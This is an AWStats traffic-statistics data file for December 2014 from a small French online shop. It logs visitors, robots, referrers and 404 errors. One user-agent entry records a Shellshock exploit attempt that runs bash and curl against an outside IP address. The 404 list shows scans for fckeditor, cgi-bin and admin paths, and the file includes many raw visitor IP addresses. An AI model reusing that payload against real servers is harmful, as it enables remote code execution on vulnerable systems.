AWSTATS DATA FILE 6.4 (build 1.814)
# If you remove this file, all statistics for date 2014-12 will be lost/reset.

# Position (offset in bytes) in this file of beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 27
POS_GENERAL 1865                
POS_TIME 2547                
POS_VISITOR 12115               
POS_DAY 24714               
POS_DOMAIN 3403                
POS_LOGIN 3636                
POS_ROBOT 3791                
POS_WORMS 4338                
POS_EMAILSENDER 4469                
POS_EMAILRECEIVER 4612                
POS_SESSION 25281               
POS_SIDER 25485               
POS_FILETYPES 4747                
POS_OS 4918                
POS_BROWSER 5022                
POS_SCREENSIZE 5562                
POS_UNKNOWNREFERER 5636                
POS_UNKNOWNREFERERBROWSER 7621                
POS_ORIGIN 8109                
POS_SEREFERRALS 8254                
POS_PAGEREFS 8422                
POS_SEARCHWORDS 9402                
POS_KEYWORDS 9554                
POS_MISC 2210                
POS_ERRORS 9613                
POS_CLUSTER 3492                
POS_SIDER_404 9750                
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20141219041017 99583 23788747 0
FirstTime 20141201000324
LastTime 20141219004121
LastUpdate 20141219054501 99583 99341 231 0 11
TotalVisits 448                 
TotalUnique 306                 
MonthHostsKnown 0                   
MonthHostsUnknown 315                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 14 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 45 160 1765837 29 30 268434
1 12 91 846259 62 64 737890
2 20 105 1081189 28 28 325993
3 33 48 532703 26 27 391692
4 56 101 1229605 26 28 198827
5 7 22 241257 19 20 242788
6 71 109 1392520 27 27 287800
7 13 69 723815 34 34 280553
8 27 137 1199743 28 30 257255
9 53 163 1747874 26 27 285258
10 44 206 2196025 24 26 284132
11 50 188 2045634 27 31 312126
12 81 293 3273908 36 37 413086
13 42 98 1188930 54 56 648748
14 36 179 1744788 27 32 266341
15 103 326 3691054 29 33 282881
16 57 135 1471811 33 35 332248
17 51 236 2359160 25 27 257119
18 71 354 3868563 24 26 261138
19 47 226 2380255 20 22 189095
20 115 240 3045294 28 30 280183
21 30 189 1850868 36 39 358902
22 59 304 3811064 391 393 2668382
23 37 176 1820349 45 45 263896
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 1
ip 1160 4155 45508505
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 12
googlebot 514 4358645 20141219022003 0
robot 113 2040705 20141218213413 0
baiduspider 63 1084531 20141219021830 0
yandex 47 727736 20141219012603 0
slurp 39 647329 20141219032755 0
spider 25 433390 20141217213109 0
bspider 14 245052 20141214134749 0
crawl 7 105602 20141219041017 0
python 4 68184 20141213021354 0
titan 1 17046 20141201125908 0
surveybot 1 17046 20141207130634 0
netcraft 1 17046 20141210163730 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 6
php 38 471251 0 0
css 175 603032 0 0
html 384 6396259 0 0
jpg 1026 24648618 0 0
php4 738 12388520 0 0
gif 1794 1000825 0 0
END_FILETYPES

# OS ID - Hits
BEGIN_OS 6
macosx 944
winlong 74
winxp 115
winnt 2373
Unknown 467
linux 182
END_OS

# Browser ID - Hits
BEGIN_BROWSER 36
firefox28.0 1
msie6.0 25
firefox20.0 20
firefox15.0 82
firefox4.0.1 10
firefox3.6 1
firefox18.0 1
curl 3
firefox34.0 178
firefox24.0 20
firefox31.0 1
firefox2.0.0.13 1
msie8.0 85
firefox6.0.2 2
firefox0.10.1 3
msie7.0 35
firefox23.0 1
wget 1
msie9.0 41
firefox27.0 1
Unknown 113
firefox32.0 27
firefox17.0 8
opera 1
firefox21.0 1
firefox7.0.1 1
firefox2.0.0.11 1
firefox33.0 193
mozilla 784
firefox14.0.1 11
firefox22.0 1
msie10.0 69
firefox6.0 4
firefox3.6.3 3
firefox19.0 11
safari 2415
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 27
Mozilla/5.0_(compatible;_meanpathbot/1.0;__http://www.meanpath.com/meanpathbot.html) 20141215234301
Mozilla/5.0_(compatible;_DotBot/1.1;_http://www.opensiteexplorer.org/dotbot,_help@moz.com) 20141219003622
Mozilla/5.1_(compatible;_r4Bot/1.1.4;__http://r4downloads.co) 20141217044032
Mozilla/5.0_(compatible;_archive.org_bot__http://www.archive.org/details/archive.org_bot) 20141217015858
Mozilla/5.1_(compatible;_XYZBot/1.1.5;__http://t2downloads.xyz) 20141215113254
- 20141207020308
Mozilla/5.0_(compatible;_bingbot/2.0;__http://www.bing.com/bingbot.htm) 20141219004156
OpenOffice/4.0.1 20141213082207
Mozilla/5.0_(compatible;_Lipperhey_SEO_Service;_http://www.lipperhey.com/) 20141213123058
Mozilla/5.0_(compatible;_OrangeBot/2.0;_support.orangebot@orange.com) 20141217032201
Apache-HttpClient/4.3_(java_1.5) 20141206151830
Go_1.1_package_http 20141201200524
rogerbot/1.0_(http://moz.com/help/pro/what-is-rogerbot-,_rogerbot-wherecat@moz.com) 20141216192157
Riddler_(http://riddler.io/about) 20141209003133
()_{_:;};_/bin/bash_-c_'curl_http://176.102.38.36/search/e.php?h=clubchancel.com/' 20141216230444
Mozilla/4.0_(compatible;) 20141212150433
BOT/0.1_(BOT_for_JCE) 20141218083631
Mozilla/5.1_(compatible;_MediaLBot/1.1.5;__http://medialine-it.com) 20141201163023
Mozilla/5.1_(compatible;_MediaBot/1.1.5;__http://trumpetsheetmusic.org) 20141209113859
nutch-1.4/Nutch-1.4 20141212160750
Java/1.6.0_04 20141217062231
Mozilla/5.0_(compatible;_SearchmetricsBot;_http://www.searchmetrics.com/en/searchmetrics-bot/) 20141218005724
Mozilla/5.1_(compatible;_x100Bot/1.1.4;__http://prox100download.com) 20141205172515
Mozilla/5.0_(compatible;_Gimme60bot/1.0;__http://gimme60.com) 20141203083715
NerdyBot 20141218171555
Mozilla/5.0_(compatible;_spbot/4.4.0;__http://OpenLinkProfiler.org/bot_) 20141201155847
Mozilla/5.0_(compatible;_MJ12bot/v1.4.5;_http://www.majestic12.co.uk/bot.php?_) 20141218210241
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 10
- 20141207020308
BOT/0.1_(BOT_for_JCE) 20141218083631
OpenOffice/4.0.1 20141213082207
nutch-1.4/Nutch-1.4 20141212160750
Apache-HttpClient/4.3_(java_1.5) 20141206151830
Java/1.6.0_04 20141217062231
Go_1.1_package_http 20141201200524
NerdyBot 20141218171555
Riddler_(http://riddler.io/about) 20141209003133
rogerbot/1.0_(http://moz.com/help/pro/what-is-rogerbot-,_rogerbot-wherecat@moz.com) 20141216192157
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 606 662
From1 0 0
From2 31 35
From3 181 181
From4 342 3277
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 2
google 30 34
search 1 1
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 20
http://www.val-joanis.com/fr/reserve_griottes.html 47 47
http://www.val-joanis.com/fr/chateau_rouge.html 40 40
http://semalt.semalt.com/crawler.php 26 26
http://buttons-for-website.com 18 18
http://make-money-online.7makemoneyonline.com/money.php 8 8
http://www.val-joanis.com/fr/chateau_blanc.html 6 6
http://mercedes-w123.net 4 4
http://www.bing.com/search 4 4
http://t2downloads.xyz 4 4
http://medialine-it.com 4 4
http://www.val-joanis.com/eng/chateau_rose.html 3 3
http://www.val-joanis.com/fr/reserve_merises.html 1 1
http://newworldmayfair.com 3 3
http://www.tibetsee.com 1 1
http://www.val-joanis.com/eng/chateau_blanc.html 1 1
http://www.val-joanis.com/fr/chateau_rose.html 2 2
http://privhosting.com 1 1
http://trumpetsheetmusic.org 3 3
http://prox100download.com 3 3
http://www.val-joanis.com/eng/chateau_rouge.html 2 2
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 0
END_SEARCHWORDS

# Search keywords - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 0
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 6
401 6 7968
403 1 0
302 7 0
206 2 256
406 1 410
404 301 323821
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 42
/app/webroot/js/fckeditor/editor/dialog/fck_about.html 1 http://clubchancel.com
/robots.txt 243 -
/apple-touch-icon.png 5 -
/admin.php 1 -
/cgi-bin/php 1 -
/apple-touch-icon-114x114-precomposed.png 1 -
/modules/fckeditor/editor/dialog/fck_about.html 1 http://clubchancel.com
/cgi-bin/id.cgi 1 -
/apiovmrpv.html 1 -
/cgi-bin/php5 1 -
//images/stories/create.gif 1 -
/cgi-bin/php4 1 -
/wp-admin/admin-ajax.php 4 -
/data/fckeditor/editor/dialog/fck_about.html 1 http://clubchancel.com
/htgbngmarfdx.html 1 -
/html/js/editor/fckeditor/editor/dialog/fck_about.html 1 http://clubchancel.com
/includes/fckeditor/editor/dialog/fck_about.html 1 http://clubchancel.com
/browserconfig.xml 1 -
/cgi-bin/php-cgi 1 -
/js/lib/fckeditor/editor/dialog/fck_about.html 1 http://clubchancel.com
/apple-touch-icon-precomposed.png 5 -
//components/com_community/index.html 1 -
/apple-touch-icon-114x114.png 1 -
/newsletters/admin/fckeditor/editor/dialog/fck_about.html 1 http://clubchancel.com
/newsletter/admin/fckeditor/editor/dialog/fck_about.html 1 http://clubchancel.com
/plugins/fckeditor/editor/dialog/fck_about.html 1 http://clubchancel.com
/fckeditor/editor/dialog/fck_about.html 1 http://clubchancel.com
/administrator/index.php 1 -
/library/fckeditor/editor/dialog/fck_about.html 1 http://clubchancel.com
/cgi-sys/entropysearch.cgi 1 -
/d2cnb4m0nke2lh.cloudfront.net/jollywallet/resources/js/2/affiliate_client.jsjs/document-data.js 1 http://www.clubchancel.com/
/news/fckeditor/editor/dialog/fck_about.html 1 http://clubchancel.com
/scripts/fckeditor/editor/dialog/fck_about.html 1 http://clubchancel.com
/administrator/ 1 -
/include/fckeditor/editor/dialog/fck_about.html 1 http://clubchancel.com
/application/fckeditor/editor/dialog/fck_about.html 1 http://clubchancel.com
/blog/wp-login.php 1 -
/scripts/ajax/fckeditor/editor/dialog/fck_about.html 2 http://clubchancel.com
/wp-login.php 6 -
/app/common/fckeditor/editor/dialog/fck_about.html 1 http://clubchancel.com
/marcozzi/fckeditor/editor/dialog/fck_about.html 1 http://clubchancel.com
/cgi-bin/php.cgi 1 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 10 first Hits must be first (order not required for others)
BEGIN_VISITOR 315
5.135.159.142 84 84 1416122 20141201200536
176.9.150.194 60 60 979050 20141218005724
104.131.217.213 42 42 703557 20141201155847
157.55.39.216 42 50 711860 20141218233502
89.122.29.82 31 31 453942 20141217062231
79.116.31.241 31 31 453942 20141215041645
157.55.39.31 28 28 469485 20141206134325
82.192.74.98 27 27 428693 20141213123059
82.124.192.242 20 48 705717 20141217220629
92.138.143.92 19 58 603016 20141203184018
186.107.239.127 1 17 140344 20141211171118
109.214.232.215 12 36 429565 20141207150944
202.46.62.90 1 1 17046 20141215161249
201.157.84.211 1 16 140302 20141206053652
201.51.162.33 1 16 140302 20141207222652
178.42.197.144 1 1 17046 20141204020704
88.168.166.58 7 75 731056 20141207173609
104.40.186.188 1 1 17046 20141201195904
90.29.80.142 9 29 550154 20141203185632
192.99.107.118 1 1 17046 20141215234301
130.211.161.162 1 1 17046 20141203171611
162.210.196.97 1 1 17046 20141203005317
90.8.183.205 3 25 190130 20141207120519
84.119.62.193 3 18 174394 20141210192841
217.69.133.169 1 1 17046 20141210130346
83.77.62.75 0 1 95658 
130.211.145.86 1 1 17046 20141210171538
93.183.204.25 3 3 53791 20141218083631
69.164.111.198 1 2 20552 20141212080915
193.252.157.50 4 34 208382 20141210110929
189.12.53.71 1 17 140344 20141201210043
220.181.108.146 1 1 17046 20141206125249
5.49.56.198 9 30 474170 20141213115629
189.68.52.146 1 17 140344 20141202140337
207.241.237.224 1 1 17046 20141217015858
108.172.8.203 1 17 140344 20141201000324
190.134.48.176 1 16 140302 20141202140324
72.232.216.2 8 8 133500 20141209061702
213.44.255.23 3 21 177299 20141207083250
78.112.97.220 8 33 562031 20141208184725
198.100.144.83 1 1 14835 20141202201935
144.76.185.173 1 1 17046 20141208072013
202.46.51.49 1 1 17046 20141207194919
187.113.127.184 1 9 48399 20141204001921
202.46.48.15 1 1 17046 20141205034432
136.243.5.87 2 2 29670 20141212183259
157.55.39.211 8 16 255919 20141216145652
109.173.98.23 3 3 51138 20141205155136
177.43.188.2 0 8 91945 
193.68.139.110 1 16 140302 20141210094645
82.239.104.246 1 1 17046 20141214134541
217.128.38.208 1 16 140302 20141212220454
193.43.252.252 4 4 64407 20141215113254
121.72.221.245 9 47 383939 20141217031706
83.78.238.154 11 36 524025 20141213221840
189.132.148.250 1 17 140344 20141205221018
80.13.175.106 3 22 174855 20141218150848
198.50.28.186 1 1 17046 20141209065432
79.179.187.28 3 35 217612 20141213070806
202.46.52.28 1 1 17046 20141208141450
31.34.3.71 2 20 161315 20141213181931
95.115.148.105 3 23 182827 20141214185846
191.247.228.159 1 16 140302 20141213222258
202.46.60.11 1 1 17046 20141211101923
157.55.39.203 2 2 33940 20141202153723
144.76.178.233 3 3 48620 20141205172515
84.52.4.142 1 1 17046 20141206042607
157.55.39.177 7 11 141045 20141219004121
189.47.226.106 1 17 140344 20141201020213
78.248.46.149 1 16 140302 20141211172816
188.73.21.130 3 21 177124 20141204193923
85.10.199.67 1 1 17046 20141204044108
188.27.208.215 1 16 140302 20141210075320
95.211.238.122 6 6 109419 20141211095324
83.149.126.98 1 1 14835 20141202202350
202.46.54.43 1 1 17046 20141216094752
136.243.5.215 1 1 14835 20141209041202
66.249.81.148 1 1 17046 20141204213404
78.215.120.215 3 26 293104 20141202195006
69.58.178.59 11 11 186245 20141216063319
202.46.49.70 1 1 17046 20141209074952
209.249.5.247 5 5 81729 20141216192157
5.23.233.209 0 1 104007 
216.172.56.37 1 1 17046 20141213033917
80.144.102.132 1 16 52973 20141207151222
198.27.66.194 1 1 14835 20141210172857
109.89.241.96 1 16 140302 20141215215037
86.73.4.49 10 30 382643 20141215235440
207.46.13.64 2 2 31616 20141201170206
216.107.155.114 1 1 17046 20141206143726
39.32.159.0 1 17 140344 20141218044036
199.30.16.189 0 1 57 
79.132.37.71 15 48 506913 20141204112221
130.211.119.126 1 1 17046 20141217211806
195.101.112.57 7 31 452128 20141201101516
37.163.251.159 2 20 161315 20141215130349
36.69.178.108 1 17 140344 20141205102111
188.40.249.84 3 3 48620 20141209113859
93.92.217.228 1 1 17046 20141214170932
212.23.178.53 9 52 484938 20141215083912
174.127.133.64 7 7 119025 20141216035926
217.108.121.217 3 26 293104 20141208134620
123.125.71.91 1 1 17046 20141206092641
92.150.228.118 9 33 512177 20141209123953
177.0.4.129 1 17 140344 20141211225121
177.98.254.194 1 17 140344 20141201150612
58.107.122.182 1 16 140302 20141215024438
162.210.196.98 1 1 17046 20141208084938
96.227.124.38 1 1 17046 20141209003757
198.27.82.152 1 1 14835 20141210122659
79.98.16.81 3 3 0 20141218131413
130.211.154.225 1 1 17046 20141206171617
202.46.55.29 1 1 17046 20141202074730
202.46.63.71 1 1 17046 20141212015529
177.129.11.214 1 17 140344 20141217174141
27.33.13.198 3 22 178047 20141201085448
92.210.20.138 2 2 32485 20141212110206
187.65.51.19 1 16 140302 20141209215358
80.12.35.195 1 17 148720 20141213101523
84.52.45.23 1 1 17046 20141207020308
92.90.16.9 1 16 140302 20141213120941
201.13.172.73 1 16 140302 20141208200946
71.177.184.59 1 1 17046 20141203083715
77.131.17.246 2 24 173262 20141214200050
189.25.83.10 1 17 140344 20141212015149
24.34.161.121 1 1 17046 20141214080101
174.127.133.88 4 4 76394 20141216035513
192.99.107.136 1 1 17046 20141215160008
146.148.94.52 1 1 17046 20141214171552
134.96.155.211 5 27 309491 20141207120800
77.151.213.18 3 22 281190 20141213123746
88.185.12.17 2 20 161315 20141213144606
84.5.111.41 5 27 224890 20141210145102
92.143.208.38 4 27 315450 20141207111722
94.23.172.110 1 1 14835 20141204162908
209.179.47.78 1 17 140344 20141212215634
23.236.50.201 1 1 17046 20141218171555
77.197.247.119 1 22 71147 20141209173622
130.211.147.32 1 1 17046 20141207170610
157.55.39.212 0 1 104007 
200.165.130.49 1 17 140344 20141215163226
109.221.208.38 10 67 698834 20141215010300
78.232.224.184 2 20 161315 20141218170412
36.250.183.188 4 4 30186 20141211031749
46.218.197.159 8 31 375771 20141218150412
162.210.196.130 2 2 31881 20141218210241
109.28.73.122 3 44 416904 20141213074200
119.63.193.132 1 1 17046 20141207194946
105.155.86.180 1 16 140302 20141206155131
202.46.51.50 1 1 17046 20141211125926
109.21.54.229 11 33 415040 20141205193431
90.5.66.146 3 26 189994 20141202213806
121.98.113.22 2 2 33708 20141212115714
92.161.234.25 16 47 423787 20141207163826
86.210.119.80 1 16 140302 20141216144341
157.55.39.176 3 7 85978 20141216124859
81.52.143.33 1 1 15819 20141209041158
130.211.166.132 1 1 17046 20141201171720
92.90.20.28 1 2 20552 20141213233214
86.210.132.56 3 25 213335 20141214182750
79.46.237.76 2 19 159843 20141207143703
86.204.224.225 1 16 140302 20141203123148
192.99.107.82 1 1 17046 20141201100334
176.35.33.226 3 26 298505 20141212175429
197.157.194.243 1 17 140344 20141209092134
91.250.15.69 8 8 128814 20141217044032
185.72.244.38 1 1 0 20141213173408
130.211.85.67 1 1 17046 20141217110503
92.132.236.60 1 17 140930 20141211105623
82.224.170.8 2 20 161315 20141215094359
209.147.118.194 1 2 20186 20141205001453
174.127.133.92 1 1 18130 20141216034318
78.225.223.69 1 16 140302 20141213193701
207.46.13.93 1 2 20325 20141209165428
193.252.118.176 1 1 17046 20141211142355
85.26.58.29 1 16 157950 20141209133832
82.67.203.35 2 24 180770 20141202192930
189.115.37.106 1 16 140302 20141205191254
146.0.42.58 1 1 14835 20141206084922
162.222.178.248 1 1 17046 20141212171607
80.215.163.101 1 1 17046 20141215155829
177.36.106.194 1 17 140344 20141214224323
199.58.86.211 1 1 17046 20141203154051
88.174.73.74 1 16 140302 20141215190844
189.78.237.20 1 16 140302 20141215220159
202.46.56.55 1 1 17046 20141201141223
194.199.224.110 1 17 158051 20141212140110
92.132.156.175 2 19 261000 20141207232531
54.173.210.181 1 1 17046 20141206081328
192.99.107.46 1 1 17046 20141208072346
84.99.105.3 18 42 432992 20141218093041
80.14.235.28 2 20 161315 20141216120419
176.102.38.36 1 1 0 20141216230444
207.46.13.47 3 5 47571 20141218155448
80.11.140.158 12 72 695279 20141212112854
188.240.88.250 1 1 17046 20141202145856
130.211.182.233 1 1 17046 20141215171613
193.252.118.175 1 1 19684 20141211061428
202.49.80.35 1 17 140344 20141201025226
5.9.11.122 1 1 17046 20141214235446
146.148.48.9 1 1 17046 20141211171556
130.211.174.195 1 1 17046 20141209171601
119.63.193.195 4 4 68184 20141215161420
92.90.20.62 12 32 436007 20141218002745
81.11.162.67 0 1 104007 
202.46.60.13 1 1 17046 20141216221507
82.234.216.189 3 22 281190 20141208190936
23.23.222.104 1 1 17046 20141217081552
85.26.117.75 1 1 17046 20141206192133
202.46.50.16 1 1 17046 20141217175347
212.23.175.187 6 29 240460 20141205144525
189.102.207.111 1 16 140302 20141216010407
178.50.77.204 3 25 189246 20141205221919
83.206.51.30 0 1 104007 
202.46.53.31 1 1 17046 20141204201424
174.127.188.37 1 1 17046 20141216002812
90.4.233.248 4 19 206441 20141217230145
90.39.41.251 6 26 423379 20141216184226
86.210.128.155 4 26 233148 20141215182141
46.173.87.181 1 1 17046 20141203052401
207.46.13.42 1 1 18140 20141209025234
177.10.213.6 1 16 140302 20141208025821
199.19.249.196 3 3 50935 20141210110918
189.73.207.47 1 17 140344 20141213180702
208.115.111.71 5 5 82442 20141215102653
54.88.64.191 1 1 17046 20141203021857
54.161.3.39 1 1 17046 20141209003133
119.63.193.194 3 3 51138 20141212015548
148.251.124.174 1 1 14835 20141204201218
92.90.21.43 1 16 140302 20141212112920
37.187.152.95 11 11 181375 20141205044642
157.55.39.206 7 7 114861 20141209054335
78.229.26.43 3 22 177875 20141203214440
119.63.193.131 4 4 68184 20141217175425
72.21.217.130 1 1 15984 20141206151830
66.249.83.207 1 1 17046 20141217054702
117.78.13.18 1 1 17046 20141212160750
81.52.143.36 2 2 34092 20141217032201
92.158.54.213 3 18 172270 20141218204216
189.83.198.202 1 16 140302 20141212235610
88.51.224.10 1 16 140302 20141209085924
113.193.179.33 1 16 140302 20141218151459
189.106.97.164 1 16 140302 20141213112743
92.210.30.10 2 2 32485 20141207215357
69.64.41.236 2 2 29670 20141214192729
208.90.57.196 10 10 158732 20141205092406
130.211.144.67 1 1 17046 20141204171612
83.141.143.226 1 17 148687 20141212165532
212.129.50.222 1 1 14835 20141218160428
202.46.55.36 1 1 17046 20141202201206
207.46.13.22 6 6 130504 20141206011524
187.1.134.246 1 16 140302 20141201124950
178.221.99.5 1 16 140302 20141208183705
174.127.133.63 6 6 104161 20141216032235
130.211.154.213 1 1 17046 20141202171600
193.191.216.76 0 1 0 
198.27.66.185 1 1 14835 20141208095045
80.12.63.233 1 16 140302 20141208160708
92.210.21.236 2 2 32485 20141203203724
90.34.14.32 1 17 148687 20141201182214
86.219.192.215 9 47 496222 20141214155639
123.231.109.29 1 17 140344 20141208080253
186.125.255.8 1 16 140302 20141217213751
210.245.199.169 1 17 140344 20141208063215
85.168.32.23 3 25 195608 20141216063741
217.234.67.231 8 27 251420 20141211123914
89.159.233.142 12 37 351969 20141210231930
130.211.170.106 1 1 17046 20141213171557
187.65.4.111 1 16 140302 20141211210320
108.59.8.70 2 2 29670 20141216204959
177.100.39.54 1 16 140302 20141210230451
86.219.65.42 1 1 15984 20141208180334
195.101.221.129 5 25 215679 20141204152654
62.163.219.254 2 20 161315 20141210122650
195.154.64.214 4 20 167972 20141213223424
77.205.203.74 1 16 56750 20141208000330
117.254.60.192 1 15 138067 20141202095935
199.30.25.215 0 14 119750 
177.20.232.169 1 17 140344 20141217005248
157.55.39.37 8 12 146401 20141207173351
177.222.17.100 1 16 140302 20141204013005
203.115.144.94 1 16 140302 20141212042036
130.211.143.218 1 1 17046 20141208171626
37.59.20.217 1 1 14835 20141206145944
174.127.133.90 1 1 17046 20141216031027
119.63.193.196 1 1 17046 20141216221642
88.160.50.85 3 26 293104 20141207093338
82.240.1.228 13 73 1444858 20141213082337
92.210.19.50 2 2 32485 20141216132441
50.57.68.14 1 1 17046 20141218044038
109.211.7.25 1 16 140302 20141205194533
193.251.52.201 1 16 140302 20141210100453
130.211.182.135 1 1 17046 20141205171629
193.251.26.161 3 23 181449 20141204173442
109.208.160.220 3 22 178047 20141209102100
195.34.78.196 1 1 17046 20141215142115
66.249.84.201 1 1 17046 20141205225043
92.90.26.106 1 16 140302 20141209111655
89.82.80.119 1 18 243570 20141207002124
202.46.62.11 1 1 17046 20141213135503
200.203.26.214 1 16 140302 20141210010154
194.2.122.158 2 2 0 20141217220623
82.225.253.149 3 22 281103 20141216205323
119.63.193.130 2 2 34092 20141213135535
144.76.137.226 10 10 166563 20141206061035
177.200.19.84 1 17 140344 20141210232126
54.164.13.202 1 1 17046 20141203021118
54.154.90.182 1 1 17046 20141213190207
62.212.73.211 2 2 34092 20141216205336
208.115.113.87 5 5 74343 20141219003622
179.192.128.43 1 17 140344 20141217174945
213.169.164.25 2 18 173875 20141217202736
84.5.129.134 1 16 140862 20141202230032
86.204.26.173 4 24 198811 20141212182833
37.162.133.8 1 1 17046 20141218095353
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 19
20141201 161 315 4045893 26
20141202 30 158 1530108 24
20141203 59 177 2155037 23
20141204 70 196 2039213 27
20141205 71 288 2938419 28
20141206 44 113 2079968 24
20141207 70 331 3518168 28
20141208 38 212 2327462 26
20141209 48 204 2100271 29
20141210 39 208 1925274 21
20141211 63 213 2138480 25
20141212 39 261 2432800 26
20141213 79 338 3683664 27
20141214 42 202 2099710 20
20141215 76 278 2824027 26
20141216 65 174 2161752 25
20141217 84 245 2804881 20
20141218 80 226 2537355 21
20141219 2 16 166023 2
END_DAY

# Session range - Number of visits
BEGIN_SESSION 6
5mn-15mn 14
30s-2mn 33
2mn-5mn 13
15mn-30mn 4
0s-30s 379
30mn-1h 5
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 10 first Pages must be first (order not required for others)
BEGIN_SIDER 26
/ 380 6328075 318 257
/product_list.php4 308 5557230 46 82
/product.php4 230 3746867 66 75
/cart.php4 54 801780 1 9
/login.php4 32 416862 5 3
/recettes.php4 28 399855 4 6
/index.php 22 369660 2 3
/cgdv.php4 22 498244 3 4
/contact.php4 21 297482 1 4
//login.php4 10 130720 0 0
/account.php4 1 19658 0 0
//contact.php4 4 60560 0 0
//index.php 5 85481 0 0
//recettes.php4 4 53896 0 0
// 4 68184 0 2
//cgdv.php4 4 91272 0 0
//account.php4 1 19890 0 0
/checkout.php4 2 33082 0 0
//cart.php4 5 54873 0 0
//mentions.php 4 7160 0 0
/confirm.php4 2 26444 0 1
/inc/e-transaction/autoresponse.php 2 0 2 2
//product.php4 4 66720 0 0
//product_list.php4 4 78736 0 0
/mentions.php 5 8950 0 0
//checkout.php4 2 34349 0 0
END_SIDER
